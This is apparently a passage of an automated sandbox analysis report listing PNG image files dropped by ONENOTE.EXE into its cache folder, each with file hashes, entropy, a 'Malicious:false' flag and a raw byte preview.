                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
